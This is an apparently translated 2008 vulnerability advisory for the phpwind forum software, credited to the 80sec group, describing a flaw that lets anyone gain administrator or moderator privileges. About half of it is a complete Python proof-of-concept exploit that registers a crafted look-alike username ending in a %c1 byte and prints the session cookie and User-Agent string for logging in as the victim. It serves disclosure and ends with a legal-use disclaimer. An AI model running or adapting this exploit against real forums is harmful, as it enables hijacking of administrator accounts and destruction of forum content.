Night Fire: Lately, there have been a lot of vulnerabilities. Just a couple of days ago, the Flash 0day exploit generator was released, along with the dvbbs8.2 (access/sql) version login.asp remote injection vulnerability. Today, a phpwind management privilege leakage vulnerability has surfaced.
Vulnerability Release: [http://www.80sec.com/](http://www.80sec.com/)
Vulnerability Author: [email protected]
Vulnerability Vendor: [http://www.phpwind.com/](http://www.phpwind.com/)
Impact Scope: This vulnerability affects all versions of phpwind.
Severity Level: High
Vulnerability Description: Phpwind is a widely used program in China. Due to a design error in the program, anyone can obtain front-end administrator or moderator privileges and perform arbitrary operations such as deleting posts.
Exploitation Method: An exploit is provided on [http://www.80sec.com/](http://www.80sec.com/).
Vulnerability Analysis: Due to a lack of understanding of the database storage mechanism during the design of the phpwind forum, there are issues with the program's logic. By registering a user with carefully crafted data, one can gain administrative privileges.
Patch Recommendation: It is suggested to disable the registration function until an official patch is released by the vendor.
Vulnerability Status:
- Discovered on May 25, 2008
- Publicly disclosed by 80sec.com on June 1, 2008
No patch is currently available.
Original Source: [http://www.80sec.com/release/phpwind-exploit.txt](http://www.80sec.com/release/phpwind-exploit.txt)
Vulnerability Testing (Python):
```python
# -*- coding: gb2312 -*-
import urllib2, httplib, sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)
def banner():
print ""
print "########################################################"
print "Phpwind All Versions Management Privilege Leakage Vulnerability Exploit PoC"
print "Copyright (C) 2006"
print "[email protected]"
print "80sec is a new small group dedicated to web security"
print "http://www.80sec.com"
def usage():
banner()
print "Usage:\n"
print " $ ./phpwind.py pwforumurl usertoattack\n"
print " pwforumurl Target forum URL, e.g., http://www.80sec.com/"
print " usertoattack Target moderator or administrator with privileges"
print " The attack will register an account on the target forum identical to the target user"
print " The latest version allows login using UID"
print " Other versions allow login using Cookie + User-Agent"
print "########################################################"
print ""
argvs = sys.argv
usage()
data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@[email protected]®emailtoall=1&step=2" % (argvs[2], "%c1")
pwurl = "%s/register.php" % argvs[1]
request = urllib2.Request(
url = pwurl,
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': '80sec owned this'},
data = data)
f = opener.open(request)
headers = f.headers.dict
cookie = headers["set-cookie"]
try:
if cookie.index('winduser'):
print "Exploit Success!"
print "Login with uid password @80sec or Cookie:"
print cookie
print "User-agent: 80sec owned this"
except:
print "Error! http://www.80sec.com"
print "Connect root#80sec.com"
```
---
**Note**: The above content includes a description of a vulnerability and its exploitation method. Please ensure that any use of such information complies with legal and ethical standards. Unauthorized testing or exploitation of vulnerabilities on systems without permission is illegal and unethical.